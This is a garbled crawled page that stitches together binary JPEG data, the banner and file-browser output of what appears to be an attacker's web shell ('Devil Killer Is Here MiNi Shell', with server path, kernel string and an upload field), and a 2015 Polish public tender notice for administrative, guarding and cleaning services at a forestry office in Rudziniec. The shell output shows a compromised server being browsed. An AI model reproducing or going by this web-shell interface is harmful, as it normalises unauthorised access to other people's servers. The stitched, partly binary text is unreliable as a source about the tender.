JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151112/305250-N-2015.html

<p class="kh_header"><b>Rudziniec: KOMPLEKSOWA OBSŁUGA ADMINISTRACYJNA
                               SIEDZIBY NADLEŚNICTWA RUDZINIEC 
                                             RUDZINIEC UL. LEŚNA 7</b><br>
<b>Numer ogłoszenia: 305250 - 2015; data zamieszczenia: 12.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Rudziniec , ul. Leśna 7, 44-160 Rudziniec, woj. śląskie, tel. 32 300 81 50, faks 32 300 81 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/rudziniec</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWA OBSŁUGA ADMINISTRACYJNA
                               SIEDZIBY NADLEŚNICTWA RUDZINIEC 
                                             RUDZINIEC UL. LEŚNA 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa obsługa administracyjna
       siedziby Nadleśnictwa Rudziniec, polegająca na stróżowaniu, obsłudze
       i konserwacji urządzeń technicznych, sprzątaniu pomieszczeń oraz 
       utrzymaniu terenu wokół siedziby Nadleśnictwa Rudziniec ul. Leśna 7 -
       szczegółowa specyfikacja w zał. Nr 2  do opisu  przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 90.61.20.00-0, 90.61.20.00-3, 90.61.20.00-9, 90.63.00.00-2, 90.91.40.00-7, 90.91.92.00-4, 98.34.11.20-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości
    5 000,00 zł (pięć tysięcy złotych)    
2. Zamawiający nie dopuszcza wnoszenia wadium w walutach obcych.
3. Wadium może być wniesione w następujących formach:
    a) pieniądzu,
    b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
        kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
    c) gwarancjach bankowych,
    d) gwarancjach ubezpieczeniowych,
    e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2
        ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
        Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275).


                                                           
   
4. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja
     musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie
     Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać
     następujące elementy:
a)	nazwę Wykonawcy, Zamawiającego, gwaranta (banku lub instytucji ubezpieczeniowej
           udzielających gwarancji) oraz wskazanie ich siedzib,
     b)  określenie wierzytelności, która ma być zabezpieczona gwarancją,
     c)  kwotę gwarancji,
     d)  termin ważności gwarancji,
     e)  zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne
          żądanie Zamawiającego zawierające oświadczenie, że Wykonawca w odpowiedzi na
          wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub
          oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba
          że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
     f)  zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie
         zamawiającego zawierające oświadczenie, iż Wykonawca którego ofertę wybrano:
         - odmówił podpisania umowy na warunkach określonych w ofercie lub
         - nie wniósł zabezpieczenia należytego wykonania umowy lub
         - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie tego
           Wykonawcy,
5. Wadium wnoszone w pieniądzu należy wpłacić na rachunek Zamawiającego:
     nr BS Gliwice 23 8457 0008 2011 0056 9392 0003, z informacją na przelewie 
     wadium przetargowe na zadanie pn. Kompleksowa obsługa administracyjna
     siedziby Nadleśnictwa Rudziniec ul. Leśna 7.
6. W przypadku wnoszenia wadium w innej formie niż w pieniądzu, oryginały dokumentów
    należy złożyć w Sekretariacie Zamawiającego, uzyskując potwierdzenie ich złożenia
    na kserokopii dokumentów.
7. W przypadku przelewu wadium na konto Zamawiającego, zaleca się dołączenie do oferty
     kserokopii przelewu potwierdzoną (za zgodność odpisu z oryginałem).
8. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w 
    oznaczonym terminie (przed terminem składania ofert) znajdzie się na wskazanym
    w rachunku bankowym Zamawiającego.
9. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono
      wadium na podstawie zapisów art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia
      odwołania jego oferta została wybrana jako najkorzystniejsza.
      Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
      najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego
      oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
12. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
      zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
      oraz wniesieniu zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki
          dotyczące:
          1) posiadania uprawnień do wykonywania określonej działalności lub czynności,
              jeżeli przepisy prawa nakładają obowiązek ich posiadania
              Opis sposobu dokonywania oceny spełnienia warunku:
              Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
              spełnienie Wykonawca ma wykazać w sposób szczególny,
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie
zamówienia oceniane będzie łączne spełnienie przez nich warunków określonych
w ppkt. 1), 2) i 3).
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, w stosunku do których  brak jest
    podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach
    o których jest mowa w art. 24 ust. 1 ustawy Pzp,
2. Ocena spełnienia ww. warunków udziału w postępowaniu odbędzie się na podstawie
    przedłożonych przez Wykonawcę dokumentów i oświadczeń wymienionych w pkt. IX
    niniejszej SIWZ, wg zasady spełnia-nie spełnia.
3. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki
    Wykonawca spełnił. Niespełnienie chociażby jednego warunku skutkować będzie
    wykluczeniem Wykonawcy z postępowania. 
    Ofertę Wykonawcy wykluczonego uznaje się za ofertę odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia warunku:
              Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże
               że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli
               okres prowadzenia działalności jest krótszy w tym okresie, wykonał (a w przypadku
               świadczeń okresowych lub ciągłych również wykonuje) należycie co najmniej 
               2 usługi polegające na stróżowaniu i sprzątaniu obiektów biurowych 
               o pow. minimum 1 000,00 m2 i wartości minimum 100 000,00 zł brutto każda
               i przedłoży dowody potwierdzające, że zamówienia te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia warunku:
               Wykonawca spełnia warunki dysponowania odpowiednim potencjałem
               technicznym oraz osobami zdolnymi do wykonania zamówienia , jeżeli wykaże
   że dysponuje minimum
               
             
                
                d) sprzętem niezbędnym do realizacji zamówienia tj.
                    - wózek serwisowy z osprzętem w ilości 1 szt na 1 osobę,
                    - urządzenie do prania dywanów i tapicerki meblowej - 1 szt
                   - kosiarka spalinowa -  1 szt, 
                   - pług do odśnieżania lub urządzenie do odśnieżana - szt. 1
                   - samochód ciężarowy ze skrzynią lub inny środek transportu
                     do wywożenia śniegu - szt. 1
                   - miotły, łopaty, grabki, motyki - w ilości co najmniej 2 szt każde  
                    
 c) w zakresie konserwacji sprzętu technicznego opisanego w Zał. Nr 2
                    do SIWZ (pkt. D) - 1 osoba posiadająca stosowną wiedzę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunki dysponowania odpowiednim potencjałem
               technicznym oraz osobami zdolnymi do wykonania zamówienia , jeżeli wykaże
               że dysponuje minimum:
               a) w zakresie usługi stróżowania: 3 osobami przewidzianymi do wykonania
                   zamówienia z minimum 12-to miesięcznym stażem pracy na obiektach 
                   typu biurowego,
               b) w zakresie utrzymania czystości i porządku: 2 osobami przewidzianymi 
                    do realizacji zamówienia z minimum 12-to miesięcznym stażem pracy
                    na obiektach typu biurowego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia warunku:
               Wykonawca spełnia warunki wykazując:
                - posiadanie polisy lub innego dokumentu ubezpieczenia potwierdzającego, 
                  że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
                  prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia
                  o sumie gwarancyjnej co najmniej 1 mln zł,
                - posiada środki finansowe lub zdolność kredytową na kwotę min. 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach
do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić inny dokument, który  w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.
Zamawiający żąda wskazania w ofercie części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom, a w przypadku gdy Wykonawca powołuje się na zasoby podwykonawców na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu , o których mowa 
w art. 22 ust. 1 Pzp, również wskazania nazw (firm) tych podwykonawców.
Jeżeli w trakcie realizacji zamówienia Wykonawca zmieni podwykonawcę lub zrezygnuje z podwykonawcy, na którego zasoby powoływał się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - jakość świadczenia  usługi sptrzątania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Pzp, Zamawiający przewiduje możliwość zmiany zawartej
    umowy, w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej
    warunków:
    1)  wystąpienie siły wyższej, siła wyższa oznacza wszelkie nadzwyczajne, 
         nieprzewidywalne sytuacje lub zdarzenia zewnętrzne o charakterze wyjątkowym, 
         pozostające poza kontrolą stron, uniemożliwiające którejkolwiek z nich wypełnienie 
         jakichkolwiek spośród jej zobowiązań przewidzianych niniejszą umową,
         nie wynikające z błędu lub zaniedbań stron oraz pozostające nie do pokonania
         pomimo dołożenia wszelkiej należytej staranności,
     2) zmiany regulacji prawnych obowiązujących w dniu zawarcia umowy, a mających
         istotny wpływ na realizację umowy, w szczególności zmiany stawki podatku VAT,
     3) zmiany danych teleadresowych Stron umowy określonych w umowie,




                                                           

     4) zmiana podwykonawców lub osób przy pomocy których Wykonawca realizuje
         przedmiot umowy,
     5) zmiany terminu realizacji umowy w przypadku okoliczności, których nie można
         było przewidzieć na etapie wszczęcia postępowania,
     6) zmiany treści umowy w przypadku, gdy zaistnieje istotna zmiana  okoliczności
         powodująca, że wykonanie umowy w dotychczasowym brzmieniu nie leży w interesie
         publicznym, czego nie dało się przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/rudziniec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rudziniec ul. Leśna 7  44-160 Rudziniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego:
